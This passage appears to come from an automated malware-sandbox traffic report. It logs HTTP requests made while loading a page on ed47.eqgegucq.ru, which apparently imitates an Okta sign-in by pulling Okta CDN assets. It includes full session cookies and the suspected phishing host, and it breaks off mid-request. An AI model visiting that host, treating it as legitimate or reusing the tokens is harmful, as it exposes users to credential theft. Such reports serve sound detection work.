laravel_session=eyJpdiI6ImlkbVlYYlI0aW1Lak9BbEtKMnBXaFE9PSIsInZhbHVlIjoiZWdUZDhsR2NWMXdXc01KQ2NwZGNvY0xXVGFuNHJMb0xvSTV0SXR0Nk5oODJkQjVSYWxPdkNNbDFweXh5Q1UyRU5GTjNnQmNXTEpPRW5peGJtNUdtdXNETDlidVplM2R2TUhNUkY5T2YrSWtySlZadnZYS01nN0JLelFYUC90SUEiLCJtYWMiOiJkNGNlOWU0MzViNmQ5OTc3MDdmOTRhZTg5YzQyNGJjMmE3M2RkZGQ4YTVkNmQ1YTlkOGZjNDQ0MTY1ZDhmZmRiIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHU HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://ed47.eqgegucq.ru/SaqM/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik5rUk54aXFsSFZJNlFjM3h3bUNkd2c9PSIsInZhbHVlIjoiVGUrY3pBTWJkbnpJS3EyMTBOd3RCZTlqMElRdGJmMERVWXFmd0hCWFlpV0N3Q09sRDR6enNhNkt3RUErT1VoUUFjUENDMHpTbC9UbjNQdStSV1VCcWNDeXI2R2Q4OVE0c3c1OUdUVXJqeSttUktTczc5N0M2ZkNZSGZrekFkVEsiLCJtYWMiOiI1NGJkMDZmOTgyYWE1NWFhZmRkN2Q2YzMxZmFiNTJhMjJiNTUxMGZkYzMzZDgxYmYxY2EyMDI5YmNiOGFlMDVlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlkbVlYYlI0aW1Lak9BbEtKMnBXaFE9PSIsInZhbHVlIjoiZWdUZDhsR2NWMXdXc01KQ2NwZGNvY0xXVGFuNHJMb0xvSTV0SXR0Nk5oODJkQjVSYWxPdkNNbDFweXh5Q1UyRU5GTjNnQmNXTEpPRW5peGJtNUdtdXNETDlidVplM2R2TUhNUkY5T2YrSWtySlZadnZYS01nN0JLelFYUC90SUEiLCJtYWMiOiJkNGNlOWU0MzViNmQ5OTc3MDdmOTRhZTg5YzQyNGJjMmE3M2RkZGQ4YTVkNmQ1YTlkOGZjNDQ0MTY1ZDhmZmRiIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /34mdHVcd0wRK58920 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /xyu8eLPpqmTcd30 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveOrigin: https://ed47.eqgegucq.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveOrigin: https://ed47.eqgegucq.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveOrigin: https://ed47.eqgegucq.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveOrigin: https://ed47.eqgegucq.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ed47.eqgegucq.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://ed47.eqgegucq.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://ed47.eqgegucq.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://ed47.eqgegucq.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveOrigin: https://ed47.eqgegucq.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveOrigin: https://ed47.eqgegucq.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /565DjQ1Ra2l4xoaZFArRnnwo5VzkldbbbqJ2d11vApKI67108 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250326%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250326T055845Z&X-Amz-Expires=300&X-Amz-Signature=5d0a92e103b4e318696c0391091e08581eb176779da74cee795c4fcda8648e79&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ed47.eqgegucq.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /wxkWLQweY9Qg0L5nCd2X623j9opsekGix38GhVF7Lj34130 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; 